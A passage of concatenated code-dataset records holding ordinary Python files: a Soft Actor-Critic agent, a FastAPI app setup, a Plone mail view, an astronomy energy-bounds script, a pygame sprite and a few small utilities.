https://github.com/ku2482/soft-actor-critic.pytorch\r\n \"\"\"\r\n\r\n def __init__(self, cfg):\r\n super().__init__(cfg)\r\n\r\n self.lr = self.agent_cfg[\"lr\"]\r\n self.policy_lr = self.agent_cfg[\"policy_lr\"]\r\n self.value_net_kwargs = self.agent_cfg[\"value_net_kwargs\"]\r\n self.policy_net_kwargs = self.agent_cfg[\"policy_net_kwargs\"]\r\n self.gamma = self.agent_cfg[\"gamma\"]\r\n self.tau = self.agent_cfg[\"tau\"]\r\n self.td_target_update_interval = int(\r\n self.agent_cfg[\"td_target_update_interval\"]\r\n )\r\n self.updates_per_step = self.agent_cfg[\"updates_per_step\"]\r\n self.grad_clip = self.agent_cfg[\"grad_clip\"]\r\n self.entropy_tuning = self.agent_cfg[\"entropy_tuning\"]\r\n self.droprate = self.value_net_kwargs[\"droprate\"]\r\n\r\n self.critic = TwinnedQNetwork(\r\n observation_dim=self.observation_dim,\r\n action_dim=self.action_dim,\r\n **self.value_net_kwargs,\r\n ).to(self.device)\r\n\r\n self.critic_target = TwinnedQNetwork(\r\n observation_dim=self.observation_dim,\r\n action_dim=self.action_dim,\r\n **self.value_net_kwargs,\r\n ).to(self.device)\r\n if self.droprate <= 0.0:\r\n self.critic_target = self.critic_target.eval()\r\n\r\n hard_update(self.critic_target, self.critic)\r\n grad_false(self.critic_target)\r\n\r\n self.policy = GaussianPolicy(\r\n observation_dim=self.observation_dim,\r\n action_dim=self.action_dim,\r\n **self.policy_net_kwargs,\r\n ).to(self.device)\r\n\r\n # self.q1_optimizer = Adam(self.critic.Q1.parameters(), lr=self.lr)\r\n # self.q2_optimizer = Adam(self.critic.Q2.parameters(), lr=self.lr)\r\n self.q_optimizer = Adam(\r\n self.critic.parameters(), lr=self.lr, betas=[0.9, 0.999]\r\n )\r\n self.policy_optimizer = Adam(\r\n self.policy.parameters(), lr=self.policy_lr, betas=[0.9, 0.999]\r\n )\r\n\r\n if self.entropy_tuning:\r\n self.alpha_lr = self.agent_cfg[\"alpha_lr\"]\r\n self.target_entropy = -torch.prod(\r\n torch.Tensor(self.action_shape).to(self.device)\r\n ).item() # target entropy = -|A|\r\n self.log_alpha = torch.zeros(\r\n 1, requires_grad=True, device=self.device\r\n ) # optimize log(alpha), instead of alpha\r\n self.alpha = self.log_alpha.exp()\r\n self.alpha_optimizer = Adam([self.log_alpha], lr=self.alpha_lr)\r\n else:\r\n self.alpha = torch.tensor(self.agent_cfg[\"alpha\"]).to(self.device)\r\n\r\n self.learn_steps = 0\r\n\r\n def explore(self, s, w): # act with randomness\r\n with torch.no_grad():\r\n a, _, _ = self.policy.sample(s)\r\n return a\r\n\r\n def exploit(self, s, w): # act without randomness\r\n with torch.no_grad():\r\n _, _, a = self.policy.sample(s)\r\n return a\r\n\r\n def learn(self):\r\n self.learn_steps += 1\r\n\r\n if self.learn_steps % self.td_target_update_interval == 0:\r\n soft_update(self.critic_target, self.critic, self.tau)\r\n\r\n # if self.per:\r\n # batch, indices, weights = self.replay_buffer.sample(self.mini_batch_size)\r\n # else:\r\n batch = self.replay_buffer.sample(self.mini_batch_size)\r\n weights = 1\r\n\r\n q_loss, errors, mean_q1 = self.update_critic(batch, weights)\r\n policy_loss, entropies = self.update_policy(batch, weights)\r\n\r\n # update_params(self.policy_optimizer, self.policy, policy_loss, self.grad_clip)\r\n # update_params(self.q1_optimizer, self.critic.Q1, q1_loss, self.grad_clip)\r\n # update_params(self.q2_optimizer, self.critic.Q2, q2_loss, self.grad_clip)\r\n\r\n if self.entropy_tuning:\r\n entropy_loss = self.calc_entropy_loss(entropies, weights)\r\n update_params(self.alpha_optimizer, None, entropy_loss)\r\n self.alpha = self.log_alpha.exp()\r\n\r\n # if self.per:\r\n # self.replay_buffer.update_priority(indices, errors.cpu().numpy())\r\n\r\n if self.learn_steps % self.log_interval == 0:\r\n metrics = {\r\n \"loss/Q\": q_loss,\r\n \"loss/policy\": policy_loss,\r\n \"state/mean_Q1\": mean_q1,\r\n \"state/entropy\": entropies.detach().mean().item(),\r\n }\r\n if self.entropy_tuning:\r\n metrics.update(\r\n {\r\n \"loss/alpha\": entropy_loss.detach().item(),\r\n \"state/alpha\": self.alpha.mean().detach().item(),\r\n }\r\n )\r\n\r\n wandb.log(metrics)\r\n\r\n def update_critic(self, batch, weights):\r\n (s, f, a, r, s_next, dones) = batch\r\n\r\n curr_q1, curr_q2 = self.calc_current_q(s, a)\r\n target_q = self.calc_target_q(r, s_next, dones)\r\n\r\n # Critic loss is mean squared TD errors.\r\n q1_loss = torch.mean((curr_q1 - target_q).pow(2) * weights)\r\n q2_loss = torch.mean((curr_q2 - target_q).pow(2) * weights)\r\n\r\n q_loss = q1_loss + q2_loss\r\n\r\n self.q_optimizer.zero_grad(set_to_none=True)\r\n q_loss.backward()\r\n self.q_optimizer.step()\r\n\r\n # TD errors for updating priority weights\r\n errors = torch.abs(curr_q1.detach() - target_q)\r\n\r\n # log values to monitor training.\r\n q_loss = q_loss.detach().item()\r\n mean_q1 = curr_q1.detach().mean().item()\r\n\r\n return q_loss, errors, mean_q1\r\n\r\n def update_policy(self, batch, weights):\r\n (s, f, a, r, s_next, dones) = batch\r\n\r\n # We re-sample actions to calculate expectations of Q.\r\n sampled_a, entropy, _ = self.policy.sample(s)\r\n # expectations of Q with clipped double Q technique\r\n q1, q2 = self.critic(s, sampled_a)\r\n\r\n if self.droprate > 0.0:\r\n q = 0.5 * (q1 + q2)\r\n else:\r\n q = torch.min(q1, q2)\r\n\r\n # Policy objective is maximization of (Q + alpha * entropy).\r\n policy_loss = torch.mean((-q - self.alpha * entropy) * weights)\r\n update_params(self.policy_optimizer, self.policy, policy_loss, self.grad_clip)\r\n\r\n return policy_loss.detach().item(), entropy\r\n\r\n def calc_entropy_loss(self, entropy, weights):\r\n # Intuitively, we increse alpha when entropy is less than target\r\n # entropy, vice versa.\r\n entropy_loss = -torch.mean(\r\n self.log_alpha * (self.target_entropy - entropy).detach() * weights\r\n )\r\n return entropy_loss\r\n\r\n def calc_current_q(self, s, a):\r\n curr_q1, curr_q2 = self.critic(s, a)\r\n return curr_q1, curr_q2\r\n\r\n def calc_target_q(self, r, s_next, dones):\r\n with torch.no_grad():\r\n a_next, _, _ = self.policy.sample(s_next)\r\n next_q1, next_q2 = self.critic_target(s_next, a_next)\r\n next_q = torch.min(next_q1, next_q2)\r\n\r\n target_q = r + (~dones) * self.gamma * next_q\r\n return target_q\r\n\r\n def calc_priority_error(self, batch):\r\n (s, _, a, r, s_next, dones) = batch\r\n with torch.no_grad():\r\n curr_q1, curr_q2 = self.calc_current_q(s, a)\r\n target_q = self.calc_target_q(r, s_next, dones)\r\n error = torch.abs(curr_q1 - target_q).cpu().numpy()\r\n return error\r\n\r\n def save_torch_model(self):\r\n from pathlib import Path\r\n\r\n path = self.log_path + f\"model{self.episodes}/\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n self.policy.save(path + \"policy\")\r\n self.critic.Q1.save(path + \"critic1\")\r\n self.critic.Q2.save(path + \"critic2\")\r\n\r\n def load_torch_model(self, path):\r\n self.policy.load(path + \"policy\")\r\n self.critic.Q1.load(path + \"critic1\")\r\n self.critic.Q2.load(path + \"critic2\")\r\n hard_update(self.critic_target, self.critic)\r\n grad_false(self.critic_target)\r\n","repo_name":"Safe-RL-IISc/barrier_shaping","sub_path":"sac.py","file_name":"sac.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"35816753515","text":"from plenum.common.constants import NYM, TARGET_NYM, ROLE, VERKEY, ALIAS, CURRENT_PROTOCOL_VERSION\nfrom plenum.common.txn_util import init_empty_txn, set_payload_data, append_payload_metadata, append_txn_metadata\n\n\nclass Member:\n \"\"\"\n Base class for different network member contexts.\n \"\"\"\n\n @staticmethod\n def nym_txn(nym, name=None, verkey=None, role=None, creator=None, txn_id=None, seq_no=None,\n protocol_version=CURRENT_PROTOCOL_VERSION):\n txn = init_empty_txn(NYM, protocol_version=protocol_version)\n\n txn_data = {\n TARGET_NYM: nym,\n }\n if verkey is not None:\n txn_data[VERKEY] = verkey\n if role is not None:\n txn_data[ROLE] = role\n if name is not None:\n txn_data[ALIAS] = name\n set_payload_data(txn, txn_data)\n\n txn = append_payload_metadata(txn,\n frm=creator)\n if txn_id:\n txn = append_txn_metadata(txn, txn_id=txn_id)\n if seq_no:\n txn = append_txn_metadata(txn, seq_no=seq_no)\n\n return txn\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/common/member/member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"15957112875","text":"\r\nfrom PySide import QtGui, QtCore,QtUiTools\r\nfrom threading import Thread\r\nfrom Queue import Queue\r\nimport time\r\n#Base class for GUI modules that abstracts away some of the setup\r\nclass module_base(QtGui.QDialog):\r\n #Imported_files list of the files that have been inported\r\n #ui_file the pyside .ui file to build the GUI for the module\r\n def __init__(self,imported_files,generated_lc,ui_file):\r\n super(module_base,self).__init__()\r\n self.files = imported_files\r\n self.gen_files = generated_lc\r\n \r\n #load the UI file\r\n file = QtCore.QFile(ui_file)\r\n file.open(QtCore.QFile.ReadOnly)\r\n loader = QtUiTools.QUiLoader()\r\n self.window = loader.load(file,self)\r\n \r\n file.close()\r\n \r\n self.window.btnCncl.clicked.connect(self.window.close)\r\n self.window.btnOk.clicked.connect(self._Ok_pressed)\r\n \r\n self.selected_file=''\r\n\r\n self.lc = None\r\n self.window.progressBar.setVisible(False)\r\n self.window.progressBar.setTextVisible(False)\r\n \r\n def mbox_error(self, string):\r\n msgBox = QtGui.QMessageBox()\r\n msgBox.setText(string)\r\n msgBox.setWindowTitle('Error')\r\n msgBox.setIcon(QtGui.QMessageBox.Critical) \r\n msgBox.exec_() \r\n\r\n def _set_button_enabled(self,state):\r\n self.window.btnCncl.setEnabled(state)\r\n self.window.btnOk.setEnabled(state)\r\n \r\n #return the selected file before handing off to the 'user' function\r\n def _Ok_pressed(self):\r\n #get currently selected file\r\n file = self.window.filelist.currentText()\r\n idx = file.find('[') #if [ exists it's an import\r\n if idx != -1:\r\n file = file[0:idx].rstrip() #get the name. if it's a generated file, it won't have a path, thus [ doesn't exist\r\n self.selected_file = None\r\n #look for the file in imported files\r\n for f in self.files:\r\n if f == file:\r\n self.selected_file = self.files[f]\r\n \r\n #let's try the user generated files\r\n if self.selected_file == None:\r\n for f in self.gen_files:\r\n if f == file:\r\n self.selected_file = self.gen_files[f] \r\n \r\n if self.selected_file == None:\r\n self.mbox_error('Could not find the selected file')\r\n return\r\n \r\n #initialize the run. This is where the module should get all the user entered input, etc.\r\n kwargs = self.init_run()\r\n \r\n #bail if we have garbage\r\n if kwargs == None:\r\n return\r\n \r\n self.window.progressBar.setVisible(True)\r\n self.window.progressBar.setRange(0,0)\r\n self.window.progressBar.reset#so it actually appears... \r\n self._set_button_enabled(False)\r\n \r\n #create a queue\r\n q = Queue()\r\n def run_exec_module(q,**kwargs):\r\n q.put(self.exec_module(**kwargs))\r\n #create our worker thread\r\n t = Thread(target=run_exec_module,args=(q,),kwargs=kwargs)\r\n t.start()\r\n \r\n\r\n #keep the UI updated. Not the best way\r\n while t.isAlive():\r\n QtGui.QApplication.processEvents()\r\n time.sleep(0.1)\r\n \r\n t.join()\r\n self.lc = q.get()\r\n \r\n self.window.progressBar.setVisible(False)\r\n self._set_button_enabled(True)\r\n if self.lc:\r\n self.window.close()\r\n \r\n #setup the ui and then show it\r\n def show_ui(self):\r\n #setup the file list\r\n self.window.filelist.clear()\r\n for f in self.files:\r\n self.window.filelist.addItem( f + ' [' + self.files[f].get_path()+']' ) \r\n\r\n if len(self.gen_files) >0:\r\n idx = len(self.files) #seperator at the end of the previous items\r\n self.window.filelist.insertSeparator(idx) #the seperator is kinda puny, so just add a few to thicken it up\r\n self.window.filelist.insertSeparator(idx)\r\n self.window.filelist.insertSeparator(idx)\r\n self.window.filelist.insertSeparator(idx)\r\n \r\n for f in self.gen_files:\r\n self.window.filelist.addItem(f)\r\n \r\n self.window.setWindowTitle(self.name + ' - ' + str(self.version))\r\n #show the window\r\n self.window.exec_()\r\n\r\n return self.lc\r\n","repo_name":"Chrismarsh/CRHM-tools","sub_path":"ui/module_base.py","file_name":"module_base.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"26015738595","text":"import pandas as pd\nimport networkx as nx\n\n\ndef checkPathway_Interactome_compatability(objectedPathway,G):\n subGraph = nx.subgraph(G, objectedPathway) # Replace 'your_main_graph' with the main graph object\n isolatedNodes = list(nx.isolates(subGraph))\n\n # Create a new graph object with the same nodes and edges as the subGraph\n modifiable_subGraph = nx.Graph(subGraph)\n\n # Remove isolated nodes from the new modifiable_subGraph\n modifiable_subGraph.remove_nodes_from(isolatedNodes)\n\n return modifiable_subGraph, isolatedNodes\n\n\ndef grandGraph_build(InteractionDBS, filterConfidence=None):\n if filterConfidence is not None:\n InteractionDBS = InteractionDBS[InteractionDBS[\"Confidence Value\"] >= filterConfidence]\n\n InteractionList = [(row[\"Gene Name Interactor A\"], row[\"Gene Name Interactor B\"]) for index, row in\n InteractionDBS.iterrows()]\n\n return nx.Graph(InteractionList)\n\ndef Pathway_parser(PathwayDBS):\n Pathway_defined_HugoSymb = dict()\n for index,row in PathwayDBS.iterrows():\n Pathway_defined_HugoSymb[row[\"pathway\"]] = row[\"hgnc_symbol_ids\"].split(\",\")\n return Pathway_defined_HugoSymb\n\nHIPPIE_dbs, CPDB_dbs = pd.read_csv(\"dbs/HIPPIE-2.2.mitab.txt\",delimiter=\"\\t\"), \\\n pd.read_csv(\"dbs/CPDB_pathways_genes_KEGG_WikiPath.tsv\",delimiter=\"\\t\")\n\ndef drawGraph(G,Pathway_name,saveGraphML=None, plot_show = None):\n if saveGraphML is not None:\n try:\n nx.write_gexf(G,\"dbs/Graphlets/\"+Pathway_name.replace(\" \",\"_\")+\".gexf\")\n except:\n print(Pathway_name)\n\n #if plot_show is not None:\n # nx.draw(G, with_labels=True, node_color='lightblue', font_weight='bold', node_size=500)\n # plt.show()\n\nif __name__ == '__main__':\n\n grandGraph_overallPathways = grandGraph_build(HIPPIE_dbs)\n\n for Pathway_name,HugoSymb_ls in Pathway_parser(CPDB_dbs).items():\n objectedPathway = grandGraph_overallPathways.subgraph(HugoSymb_ls)\n isolatedGraph_of_Pathway, isolatedNodes = checkPathway_Interactome_compatability(objectedPathway,grandGraph_overallPathways)\n drawGraph(isolatedGraph_of_Pathway, Pathway_name,saveGraphML=True)\n","repo_name":"ugur0sahin/PathwayTPR","sub_path":"misc/NetworkPathway_integrator.py","file_name":"NetworkPathway_integrator.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13369591116","text":"import pygame\nimport os.path\n\n\nclass Patlama(pygame.sprite.Sprite):\n def __init__(self, meteor, klasor, liste):\n super().__init__()\n self.meteor = meteor\n self.klasor = klasor\n self.liste = liste\n self.sayac = 1\n self.image = pygame.transform.scale(pygame.image.load(os.path.join(self.klasor, self.liste[self.sayac])),\n self.meteor.image.get_size())\n self.rect = self.image.get_rect()\n self.rect.center = self.meteor.rect.center\n self.delay = 75\n self.sonDegisim = pygame.time.get_ticks()\n\n def update(self, *args):\n now = pygame.time.get_ticks()\n if now - self.sonDegisim > self.delay:\n self.sonDegisim = now\n self.image = pygame.transform.scale(pygame.image.load(os.path.join(self.klasor, self.liste[self.sayac])),\n self.meteor.image.get_size())\n self.rect = self.image.get_rect()\n self.rect.center = self.meteor.rect.center\n self.sayac += 1\n\n if self.sayac == len(self.liste):\n self.kill()","repo_name":"MertAkin0/python-space-game","sub_path":"Patlama.py","file_name":"Patlama.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33977928601","text":"from fastapi import FastAPI\nfrom fastapi.responses import ORJSONResponse\nfrom fastapi_cache import FastAPICache\nfrom fastapi_cache.backends.redis import RedisBackend\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom redis import asyncio as aioredis\n\nfrom src.auth.base_config import auth_backend, fastapi_users\nfrom src.auth.schemas import UserRead, UserCreate, UserUpdate\nfrom src.operations.router import router as router_operation\nfrom src.tasks.router import router as router_task\nfrom src.chat.router import router as router_chat\nfrom src.pages.router import router as router_page\nfrom src.playlist.router import router as router_playlist\n\nfrom src.settings.settings import Settings\n\napp = FastAPI(\n debug=Settings.DEBUG,\n version=\"0.0.1\",\n default_response_class=ORJSONResponse,\n title=\"FastAPI App\"\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=Settings.CORS_ALLOW_ORIGINS,\n allow_credentials=Settings.CORS_ALLOW_CREDENTIALS,\n allow_methods=Settings.CORS_ALLOW_METHODS,\n allow_headers=Settings.CORS_ALLOW_HEADERS,\n)\n\n\n@app.on_event(event_type=\"startup\")\nasync def startup():\n redis = aioredis.from_url(\n Settings.REDIS_URL, encoding=\"utf8\", decode_responses=True\n )\n FastAPICache.init(RedisBackend(redis), prefix=\"fastapi-cache\")\n\n\nAPI_PREFIX = \"/api/v1\"\n\napp.include_router(\n fastapi_users.get_auth_router(auth_backend),\n prefix=API_PREFIX,\n tags=[\"Auth\"],\n)\n\napp.include_router(\n fastapi_users.get_register_router(UserRead, UserCreate),\n prefix=API_PREFIX,\n tags=[\"Auth\"],\n)\n\napp.include_router(\n fastapi_users.get_users_router(UserRead, UserUpdate),\n prefix=f\"{API_PREFIX}/users\",\n tags=[\"Users\"],\n)\n\napp.include_router(router=router_operation, prefix=API_PREFIX)\napp.include_router(router=router_task, prefix=API_PREFIX)\napp.include_router(router=router_playlist, prefix=API_PREFIX)\napp.include_router(router=router_chat)\napp.include_router(router=router_page)\n","repo_name":"Cubinec-py/FastApi","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41535004958","text":"import zope\n\nfrom Acquisition import aq_parent\nfrom five import grok\nfrom plone import api\n\nfrom collective.dms.mailcontent.dmsmail import IDmsIncomingMail\nfrom collective.task.content.task import ITask\nfrom pfwbged.basecontent.types import IBoardDecision\nfrom plone.api.exc import InvalidParameterError\nfrom plone.dexterity.browser import add\n\n\nclass NoIDmsIncomingMailFound(Exception):\n \"\"\"No IDmsIncomingMail found\"\"\"\n\n\nclass CreateOutgoingMailFromTask(grok.View):\n\n grok.name(\"create_outgoing_mail\")\n grok.context(ITask)\n grok.require(\"zope2.View\")\n\n def find_incomingmail(self):\n \"\"\"Find the first IDmsIncomingMail in the acquisition chain\"\"\"\n parent = self.context\n while not IDmsIncomingMail.providedBy(parent):\n parent = aq_parent(parent)\n if parent is None:\n raise NoIDmsIncomingMailFound\n return parent\n\n def render(self):\n task = self.context\n incomingmail = self.find_incomingmail()\n container_path = '/'.join(incomingmail.getPhysicalPath())\n catalog = api.portal.get_tool(\"portal_catalog\")\n brains = catalog.searchResults({\"portal_type\": \"task\",\n \"path\": container_path,\n \"review_state\": \"in-progress\"})\n\n values = {}\n values['title'] = u\"Re: \" + incomingmail.title\n values['recipients'] = u'/'.join(incomingmail.sender.to_object.getPhysicalPath())\n values['in_reply_to'] = u'/'.join(incomingmail.getPhysicalPath())\n values['treating_groups'] = task.responsible[0]\n values['related_task'] = u'/'.join(task.getPhysicalPath())\n values_url = u\"\"\"\nform.widgets.IBasic.title=%(title)s&\nform.widgets.recipients:list=%(recipients)s&\nform.widgets.in_reply_to:list=%(in_reply_to)s&\nform.widgets.IRelatedTask.related_task=%(related_task)s&\nform.widgets.treating_groups=%(treating_groups)s\"\"\" % values\n if incomingmail.keywords:\n values_url += '&' + '&'.join([\n 'form.widgets.IPfwbDocument.keywords=%s' % x\n for x in incomingmail.keywords])\n for principal, local_roles in incomingmail.get_local_roles():\n if 'Editor' in local_roles:\n values_url += '&' + 'form.widgets.treating_groups:list=%s' % principal\n if 'Reader' in local_roles:\n values_url += '&' + 'form.widgets.recipient_groups:list=%s' % principal\n\n folder_url = api.portal.get()['documents'].absolute_url()\n url = folder_url + \"/++add++dmsoutgoingmail?\" + values_url.encode('utf-8')\n self.request.response.redirect(url)\n\n\nclass CreateOutgoingMailFromBoardDecision(grok.View):\n\n grok.name(\"create_outgoing_mail\")\n grok.context(IBoardDecision)\n grok.require(\"zope2.View\")\n\n def render(self):\n decision = self.context\n\n values_params = [\n u'form.widgets.related_docs:list={}'.format(\n u'/'.join(decision.getPhysicalPath()),\n ),\n ]\n\n list_fields = {\n 'treated_by': 'IPfwbDocument.treated_by',\n 'treating_groups': 'treating_groups',\n 'recipient_groups': 'recipient_groups',\n 'keywords': 'IPfwbDocument.keywords',\n }\n for field_id, field_param_id in list_fields.items():\n field = getattr(decision, field_id, []) or []\n for item in field:\n values_params.append(\n u'form.widgets.{}:list={}'.format(field_param_id, item)\n )\n\n documents_folder_url = api.portal.get()['documents'].absolute_url()\n if self.request.form.get('follow_up'):\n values_params.append('follow_up=1')\n encoded_params = \"&\".join(values_params).encode('utf-8')\n url = '{0}/++add++dmsoutgoingmail?{1}'.format(\n documents_folder_url,\n encoded_params,\n )\n self.request.response.redirect(url)\n\n\nclass AddForm(add.DefaultAddForm):\n\n portal_type = \"dmsoutgoingmail\"\n\n @property\n def action(self):\n base_action = super(AddForm, self).action\n return '{}?follow_up=1'.format(base_action)\n\n def createAndAdd(self, data):\n obj = self.create(data)\n zope.event.notify(zope.lifecycleevent.ObjectCreatedEvent(obj))\n self.add(obj)\n self.transition_board_decision() # addition to base method\n return obj\n\n def transition_board_decision(self):\n \"\"\"\n If the created mail is a follow-up (GET parameter),\n search for board decisions in processing state among related documents,\n transition the first one found to answered.\n \"\"\"\n\n follow_up = self.request.form.get('follow_up', False)\n if not follow_up:\n return\n\n related_docs = getattr(\n self.widgets.get('related_docs'),\n 'value',\n [],\n )\n portal = api.portal.get()\n for related_doc_path in related_docs:\n related_doc = portal.restrictedTraverse(related_doc_path.split('/'))\n if IBoardDecision.providedBy(related_doc) and api.content.get_state(related_doc) == 'processing':\n try:\n api.content.transition(related_doc, 'answer')\n break\n except InvalidParameterError: # answer transition is not available\n pass\n\n\nclass AddView(add.DefaultAddView):\n form = AddForm\n","repo_name":"affinitic/pfwbged.policy","sub_path":"src/pfwbged/policy/browser/create_outgoing_mail.py","file_name":"create_outgoing_mail.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31027149241","text":"def productSum(array, depth=1):\r\n #if no depth given in arg, say depth is 1\r\n\r\n #say that the sum is 0, you'll increment it as you go through array\r\n #go through each elem, and if normal elem, increment w/ depth * whatever it is\r\n sum = 0\r\n for e in array:\r\n if isinstance(e, int): # elem normal\r\n #just increment it\r\n sum += e\r\n elif isinstance(e, list): #elem is special, use recursion\r\n sum += productSum(e, depth + 1)\r\n\r\n return depth * sum\r\n\r\n\r\n# space o(max_depth)\r\n# time o(n), n is amount of integers\r\n","repo_name":"jaquinocode/my-algorithms-python","sub_path":"product_sum_recursion_depth.py","file_name":"product_sum_recursion_depth.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73869772890","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 6 14:37:00 2020\n\n@author: mario\n\"\"\"\n\nimport sys\nimport glob\nimport numpy as np\nfrom astropy.io import fits\nfrom find_nearest_idx import find_nearest_idx\n\n# =============================================================================\n# Find and read rmf files\n# =============================================================================\n\ndef get_ebounds_from_rmf(rmf_string):\n rmf_file = fits.open(rmf_string)\n rmf_data = np.array(rmf_file['EBOUNDS'].data.tolist())\n emin = rmf_data[:,1]\n emax = rmf_data[:,2]\n return np.array([emin,emax]).T\n\nebounds10 = get_ebounds_from_rmf(glob.glob('lx10cshp*')[0])\nebounds20 = get_ebounds_from_rmf(glob.glob('lx20cshp*')[0])\nebounds30 = get_ebounds_from_rmf(glob.glob('lx30cshp*')[0])\n\n# =============================================================================\n# Start with getting all the indices for ebounds20 using one of two methods:\n# EXCLUDING extremes: If any values are contained within a bin with a range\n# outside the min/max, that bin is ignored\n# INCLUDING extremes: If any values are contained within a bin with a range\n# outside the min/max, that bin is included\n# =============================================================================\n\nextreme_method = str(input('Do you want to include the extremes of the energy range? Default: n (y/n) > ')) or 'n'\nextreme_method = extreme_method.lower()\nif extreme_method == 'n':\n print('EXCLUDING extremes of energy ranges')\nelif extreme_method == 'y':\n print('INCLUDING extremes of energy ranges')\nelse:\n sys.exit('Invalid method choice. Use \"y\" or \"n\".')\n\n\ndef get_ebounds20idx():\n # Explicitly defined as 3-80 keV. This is the working range for LAXPC\n vals3to80 = np.arange(3,81,1) \n idx = []\n for val in vals3to80:\n nearest20idx = find_nearest_idx(ebounds20[:,0],val)\n\n # =============================================================================\n # Dealing with extremes (e.g. including 3.0 for a 3.0-80.0 range)\n # =============================================================================\n if val == vals3to80[0]:\n if extreme_method == 'n' and ebounds20[:,0][nearest20idx] < val:\n nearest20idx += 1\n elif extreme_method == 'y' and ebounds20[:,0][nearest20idx] > val:\n nearest20idx -= 1\n\n if val == vals3to80[-1]:\n if extreme_method == 'n' and ebounds20[:,0][nearest20idx] > val:\n nearest20idx -= 1\n elif extreme_method == 'y' and ebounds20[:,0][nearest20idx] < val:\n nearest20idx += 1\n\n nearest20 = ebounds20[:,0][nearest20idx]\n idx.append(np.where(ebounds20[:,0] == nearest20)[0][0])\n\n return np.asarray(idx)\n\nebounds20lims = ebounds20[get_ebounds20idx(),0]\n\n# =============================================================================\n# Round up so that the values chosen can be included in the range we'll define\n# =============================================================================\nebounds20ceil = np.ceil(ebounds20lims*100)/100\n\n# =============================================================================\n# Now, get the indices for the ebounds10 and ebounds30 where we have the the\n# last values that are smaller than the specified value of ebounds20. This\n# will be used to make sure that all of them are included the defined range\n# =============================================================================\n\ndef get_eboundsidx(ebounds,ebounds20ceil):\n idx = []\n for val in ebounds20ceil:\n idx.append(np.where(ebounds[:,0] < val)[0][-1])\n return np.asarray(idx)\n\nebounds10lims = ebounds10[get_eboundsidx(ebounds10,ebounds20ceil),0]\nebounds30lims = ebounds30[get_eboundsidx(ebounds30,ebounds20ceil),0]\n\n# =============================================================================\n# Vertically stack the arrays so we can now find the lower bound of what needs\n# to be included to make sure the energy bounds are included properly. We'll\n# find the minimum of all three and then round down to make sure we include\n# everything. I'll have to check to make sure there are no overlaps afterward.\n# =============================================================================\n\ndef get_ebounds(ebounds10lims,ebounds20lims,ebounds30lims,decimals=2):\n eboundslims = np.vstack((ebounds10lims,ebounds20lims,ebounds30lims))\n\n # Get the specified decimal places by using the operations below\n eboundslimsMIN = np.floor(np.min(eboundslims,axis=0)*(10**decimals))/(10**decimals)\n eboundslimsMAX = np.ceil(np.max(eboundslims,axis=0)*(10**decimals))/(10**decimals)\n\n # Mental check. eboundslimsMAX should be equal to ebounds20ceil\n if (ebounds20ceil == eboundslimsMAX).all() == True:\n print('Everything is gucci. (ebounds seem correctly set-up)')\n else:\n print('Something\\'s not gucci. (ebounds are incorrectly written)')\n\n return np.array([eboundslimsMIN[0:-1],eboundslimsMAX[1:]]).T\n\nebounds = get_ebounds(ebounds10lims,ebounds20lims,ebounds30lims)\n\n# =============================================================================\n# Check the counts of each row in the given ebounds ranges. All should be used\n# only once so that we don't double count counts. (tongue twister?)\n# =============================================================================\n\ndef check_arr_counts(ebounds_rmf_ranges,ebounds):\n ebounds_inside_lim = []\n for row in ebounds_rmf_ranges:\n if min(ebounds[:,0]) < row[0] and row[1] < max(ebounds[:,1]):\n ebounds_inside_lim.append(row)\n\n ebounds_inside_lim = np.asarray(ebounds_inside_lim)\n ebounds_arr_counts = np.zeros(len(ebounds_inside_lim))\n\n for row in ebounds:\n for i in range(len(ebounds_inside_lim)):\n if row[0] < ebounds_inside_lim[i,0] and ebounds_inside_lim[i,1] < row[1]:\n ebounds_arr_counts[i] += 1\n\n if (ebounds_arr_counts == 1).all() == True:\n return True # all counts are used only once\n else:\n return False # some counts are counted more than once or not at all\n\nif check_arr_counts(ebounds10,ebounds) *\\\n check_arr_counts(ebounds20,ebounds) *\\\n check_arr_counts(ebounds30,ebounds) == True:\n print('All counts counted once.')\nelse:\n sys.exit('I counted the counts wrong :(')\n","repo_name":"astroslav/astrosat-pipeline-public","sub_path":"get_ebounds_from_rmf.py","file_name":"get_ebounds_from_rmf.py","file_ext":"py","file_size_in_byte":6425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1277583818","text":"# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef print_hi(name):\n # Use a breakpoint in the code line below to debug your script.\n print(f'Hi, {name}') # Press ⌘F8 to toggle the breakpoint.\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n print_hi('PyCharm')\n\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n\nimport csv\nimport tkinter as tk\nfrom tkinter import filedialog\n\nroot = tk.Tk()\nroot.withdraw()\n\nfile_path = filedialog.askopenfilename()\nprint('Reading: ',file_path)\n\n\ndef readmyfile(filename):\n dates = []\n scores = []\n\n with open(filename) as csvDataFile:\n csvReader = 